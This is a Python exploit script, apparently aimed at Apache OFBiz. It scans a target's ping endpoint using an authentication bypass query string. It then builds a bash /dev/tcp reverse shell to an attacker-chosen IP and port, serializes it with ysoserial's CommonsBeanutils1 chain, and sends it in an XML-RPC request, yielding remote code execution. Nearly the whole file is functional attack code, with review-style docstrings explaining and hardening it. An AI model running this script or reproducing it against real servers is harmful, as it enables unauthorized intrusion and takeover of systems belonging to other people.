import requests
import sys
import urllib3
import argparse
from urllib.parse import urlparse
import base64
import os
import subprocess
# Silence urllib3's InsecureRequestWarning: every request in this script is sent
# with verify=False, i.e. TLS certificate validation is disabled. That is a
# deliberate trade-off for a pentest tool aimed at lab / self-signed targets, but
# it also means the script would not notice an interposed proxy or a spoofed host.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
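def ascii() -> str:
    """Print the tool banner and return the banner text.

    The original assigned the result of ``print`` (always ``None``) to a local
    and returned that, so the return value was useless; returning the text
    itself is backward-compatible (the caller ignores the result).

    Note: this function shadows the builtin ``ascii``. The name is kept because
    ``main`` calls it by that name.

    Returns:
        The banner exactly as printed (without the trailing newline ``print`` adds).
    """
    banner = """ _ _ _ _ _ ___ _
| || |__ _ __| |__ | |_| |_ ___ | _ \ |__ _ _ _ ___| |_
| __ / _` / _| / / | _| ' \/ -_) | _/ / _` | ' \/ -_) _|
|_||_\__,_\__|_\_\\ \__|_||_\___| |_| |_\__,_|_||_\___|\__|
"""
    print(banner)
    return banner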
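def scan(clean_url: str) -> None:
    """Probe ``clean_url`` for the unauthenticated ping endpoint and offer to exploit it.

    Args:
        clean_url: Target base URL (scheme + host[:port]) with no trailing slash.

    A single GET with a timeout is sent to the ``ping`` controller. The original
    sent the probe twice, the first time with *no* timeout, so an unresponsive
    host hung the scan forever; it also printed nothing at all for a non-200
    response. A 200 whose body contains ``PONG`` is treated as vulnerable.

    The ``;/`` path-parameter segment together with ``requirePasswordChange=Y``
    is presumably what bypasses authentication on the target — the script
    relies on it but never verifies that separately (TODO confirm against the
    target version). Note that ``PONG`` on a 200 is only a fingerprint; a
    permissive proxy or catch-all page could in principle return it too.

    Network errors are reported and the function returns. ``sys.exit`` from the
    prompt propagates (``SystemExit`` is not an ``Exception``).
    """
    ping_check_url = f"{clean_url}/webtools/control/ping;/?USERNAME=&PASSWORD=&requirePasswordChange=Y"
    print("Scanning...")
    try:
        # verify=False: TLS validation is intentionally off for lab targets.
        response = requests.get(ping_check_url, timeout=7, verify=False)
    except requests.RequestException as e:
        print(e)
        return

    if response.status_code == 200 and "PONG" in response.text:
        print("Target is vulnerable!!\n")
        choice = input("Do you want to exploit this and pop a shell? (Y)es or (N)o \n")
        if choice.strip().lower() in ["y", "yes"]:
            exploit(clean_url)
        else:
            sys.exit("Exiting..")
    else:
        print("Target is not vulnerable :(")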
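def exploit(url: str) -> None:
    """Serialize a reverse-shell gadget chain with ysoserial and deliver it to the XML-RPC endpoint.

    Args:
        url: Target base URL (scheme + host[:port]) with no trailing slash.

    Flow: prompt for the listener IP/port, base64-wrap a bash ``/dev/tcp``
    reverse shell, run ``ysoserial-all.jar`` (which must sit in the current
    directory) to serialize it with the ``CommonsBeanutils1`` chain, base64 the
    serialized bytes and embed them in an XML-RPC ``<serializable>`` element
    sent to ``/webtools/control/xmlrpc;/...`` with the same
    ``requirePasswordChange=Y`` auth-bypass query the scanner uses.

    Changes from the original: the port is validated as an integer, ysoserial
    is invoked as an argv list (no ``shell=True``), a non-zero exit or empty
    output from java aborts instead of shipping an empty payload, and the HTTP
    outcome of the delivery request is reported instead of being ignored.

    Exits via ``sys.exit`` on completion, on a missing jar, on bad input, or on
    a failed ysoserial run.
    """
    attacker_ip = input("Enter your IP: ").strip()
    attacker_port = input("Enter the listening port: ").strip()
    try:
        port = int(attacker_port)
    except ValueError:
        sys.exit(f"Invalid port: {attacker_port!r}")
    if not 1 <= port <= 65535:
        sys.exit(f"Port out of range: {port}")

    rev_shell = f"bash -i >& /dev/tcp/{attacker_ip}/{port} 0>&1"
    encoded_rev_shell = base64.b64encode(rev_shell.encode("utf-8")).decode()
    # The base64 alphabet keeps the user-supplied IP/port out of any shell
    # grammar; the {echo,...} brace form avoids spaces in the command that the
    # gadget chain eventually runs on the target.
    java_command = f"bash -c {{echo,{encoded_rev_shell}}}|{{base64,-d}}|{{bash,-i}}"

    print("Checking if ysoserial-all.jar exists in the current directory....\n")
    jar_path = os.path.join(os.getcwd(), "ysoserial-all.jar")
    if not os.path.exists(jar_path):
        sys.exit("Please place the ysoserial-all.jar file in the current directory..")

    print("Serializing the payload\n")
    serialized = _serialize_payload(jar_path, java_command)
    # b64encode never emits newlines, so the original's .replace("\n", "") was a no-op.
    final_encoded = base64.b64encode(serialized).decode()

    vuln_url = f"{url}/webtools/control/xmlrpc;/?USERNAME=&PASSWORD=&requirePasswordChange=Y"
    body = _build_xmlrpc_body(final_encoded)
    try:
        # NOTE(review): the XML-RPC body is sent with GET, as in the original.
        # XML-RPC endpoints normally expect POST; kept as-is because it is not
        # verifiable here whether the target reads the body on GET — confirm.
        response = requests.get(vuln_url, data=body, timeout=4, verify=False)
    except requests.Timeout:
        # The request may not return while the target is holding the
        # connection open for the shell; check the listener before assuming failure.
        print("Request timed out (this can be expected while the shell runs) - check your listener.")
        sys.exit("Exploit completed. Enjoy ^^ ")
    except requests.RequestException as e:
        sys.exit(f"Request failed: {e}")

    print(f"Target responded with HTTP {response.status_code}")
    sys.exit("Exploit completed. Enjoy ^^ ")


def _serialize_payload(jar_path: str, command: str) -> bytes:
    """Run ysoserial with the CommonsBeanutils1 chain and return the serialized bytes.

    Args:
        jar_path: Absolute path to ``ysoserial-all.jar``.
        command: The command the gadget chain should execute on the target.

    Exits if java cannot be started, exits non-zero, or produces no output —
    the original ignored all three and would have sent an empty payload.
    """
    argv = ["java", "-jar", jar_path, "CommonsBeanutils1", command]
    try:
        result = subprocess.run(argv, stdout=subprocess.PIPE, stderr=subprocess.PIPE, check=False)
    except OSError as e:
        sys.exit(f"Could not run java: {e}")
    if result.returncode != 0 or not result.stdout:
        sys.exit("ysoserial failed:\n" + result.stderr.decode(errors="replace"))
    return result.stdout


def _build_xmlrpc_body(encoded_payload: str) -> str:
    """Wrap a base64 serialized object in an XML-RPC ``<serializable>`` extension element.

    Args:
        encoded_payload: Base64 text of the serialized gadget chain.

    Returns:
        The XML-RPC request body; the method name is a placeholder because the
        deserialization happens while the parameters are parsed.
    """
    return f"""<?xml version="1.0"?>
<methodCall>
<methodName>Methodname</methodName>
<params>
<param>
<value>
<struct>
<member>
<name>test</name>
<value>
<serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">{encoded_payload}</serializable>
</value>
</member>
</struct>
</value>
</param>
</params>
</methodCall>"""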
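def main() -> None:
    """Parse the target URL from argv, validate it, and start the scan.

    ``argparse`` now owns the usage/``--help`` output; the original duplicated
    it with a manual ``len(sys.argv)`` check. A URL without an ``http``/``https``
    scheme, or without a host part, is rejected through ``parser.error``
    (exit status 2) so a bare ``host:port`` — which ``urlparse`` reads as
    scheme ``host`` — never reaches the scanner.
    """
    parser = argparse.ArgumentParser(description="URL Parser")
    parser.add_argument("url", help="The URL to parse")
    args = parser.parse_args()

    ascii()
    # Trailing slashes would otherwise double up in the paths the scanner builds.
    target = args.url.rstrip("/")
    parsed = urlparse(target)
    if parsed.scheme not in {"http", "https"}:
        parser.error("Use http or https in the beginning of the target URL...")
    if not parsed.netloc:
        parser.error("The target URL needs a host part, e.g. https://host:8443")
    scan(target)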
# Script entry point: only run when executed directly, not when imported.
if __name__ == "__main__":
    main()